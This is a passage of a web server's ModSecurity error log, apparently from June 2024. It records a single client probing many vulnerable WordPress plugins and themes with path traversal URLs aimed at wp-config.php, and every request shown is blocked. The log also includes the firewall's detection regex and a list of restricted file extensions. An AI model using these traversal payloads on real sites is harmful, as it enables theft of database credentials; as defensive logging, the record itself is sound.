"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZmDIt3-RSuYgfBobnK4naQAAABU"] [Wed Jun 05 15:21:11.339109 2024] [:error] [pid 6611:tid 139916134508288] [client 146.70.105.59:52962] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp\\xe2\\x80\\x94admin/admin\\xe2\\x80\\x94ajax.php"] [unique_id "ZmDIt7fZx2Sf7LbCrFH3JQAAANQ"] [Wed Jun 05 15:21:17.002313 2024] [:error] [pid 5985:tid 139916210042624] [client 146.70.105.59:53000] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZmDIvX-RSuYgfBobnK4nbAAAAAs"] [Wed Jun 05 15:21:18.089537 2024] [:error] [pid 6611:tid 139916142900992] [client 146.70.105.59:53012] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "ZmDIvrfZx2Sf7LbCrFH3LwAAANM"] [Wed Jun 05 15:21:18.242917 2024] [:error] [pid 6611:tid 139916184864512] [client 146.70.105.59:53014] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZmDIvrfZx2Sf7LbCrFH3MAAAAM4"] [Wed Jun 05 15:21:24.633957 2024] [:error] [pid 5985:tid 139916218435328] [client 146.70.105.59:53060] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZmDIxH-RSuYgfBobnK4ncQAAAAo"] [Wed Jun 05 15:21:28.104305 2024] [:error] [pid 5987:tid 139916372625152] [client 146.70.105.59:53086] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZmDIyOddjqHaWkbIrEiThgAAAIA"] [Wed Jun 05 15:21:30.397013 2024] [:error] [pid 6611:tid 139916372625152] [client 146.70.105.59:53104] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZmDIyrfZx2Sf7LbCrFH3RgAAAMA"] [Wed Jun 05 15:21:39.706379 2024] [:error] [pid 5986:tid 139916364232448] [client 146.70.105.59:53172] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZmDI0-z5jJkMRt_Mf_6i3AAAAEE"] [Wed Jun 05 15:21:46.577737 2024] [:error] [pid 5987:tid 139916268791552] [client 146.70.105.59:53216] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "ZmDI2uddjqHaWkbIrEiTkgAAAIQ"] [Wed Jun 05 15:21:55.845751 2024] [:error] [pid 6611:tid 139916218435328] [client 146.70.105.59:53244] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZmDI47fZx2Sf7LbCrFH3XgAAAMo"] [Wed Jun 05 15:21:56.045932 2024] [:error] [pid 6611:tid 139916176471808] [client 146.70.105.59:53246] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZmDI5LfZx2Sf7LbCrFH3XwAAAM8"] [Wed Jun 05 15:22:00.774967 2024] [:error] [pid 5987:tid 139916117722880] [client 146.70.105.59:53254] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZmDI6OddjqHaWkbIrEiTlQAAAJY"] [Wed Jun 05 15:22:07.575949 2024] [:error] [pid 5986:tid 139916355839744] [client 146.70.105.59:53266] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "ZmDI7-z5jJkMRt_Mf_6i5gAAAEI"] [Wed Jun 05 15:22:23.419979 2024] [:error] [pid 6611:tid 139916100937472] [client 146.70.105.59:53290] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "ZmDI_7fZx2Sf7LbCrFH3agAAANg"] [Wed Jun 05 15:22:23.573856 2024] [:error] [pid 6611:tid 139916218435328] [client 146.70.105.59:53292] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZmDI_7fZx2Sf7LbCrFH3awAAAMo"] [Wed Jun 05 15:22:29.292671 2024] [:error] [pid 5987:tid 139916184864512] [client 146.70.105.59:53310] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "ZmDJBeddjqHaWkbIrEiTnAAAAI4"] [Wed Jun 05 15:22:31.070754 2024] [:error] [pid 6611:tid 139916168079104] [client 146.70.105.59:53316] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "ZmDJB7fZx2Sf7LbCrFH3cAAAANA"] [Wed Jun 05 15:22:31.202274 2024] [:error] [pid 6611:tid 139916126115584] [client 146.70.105.59:53318] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZmDJB7fZx2Sf7LbCrFH3cQAAANU"] [Wed Jun 05 15:22:36.752690 2024] [:error] [pid 5987:tid 139916277184256] [client 146.70.105.59:53328] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZmDJDOddjqHaWkbIrEiTnwAAAIM"] [Wed Jun 05 15:22:41.441837 2024] [:error] [pid 5987:tid 139916260398848] [client 146.70.105.59:53334] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "ZmDJEeddjqHaWkbIrEiToQAAAIU"] [Wed Jun 05 15:22:44.524608 2024] [:error] [pid 6611:tid 139916109330176] [client 146.70.105.59:53340] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZmDJFLfZx2Sf7LbCrFH3dgAAANc"] [Wed Jun 05 15:22:47.513006 2024] [:error] [pid 6611:tid 139916100937472] [client 146.70.105.59:53348] [client 146.70.105.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match 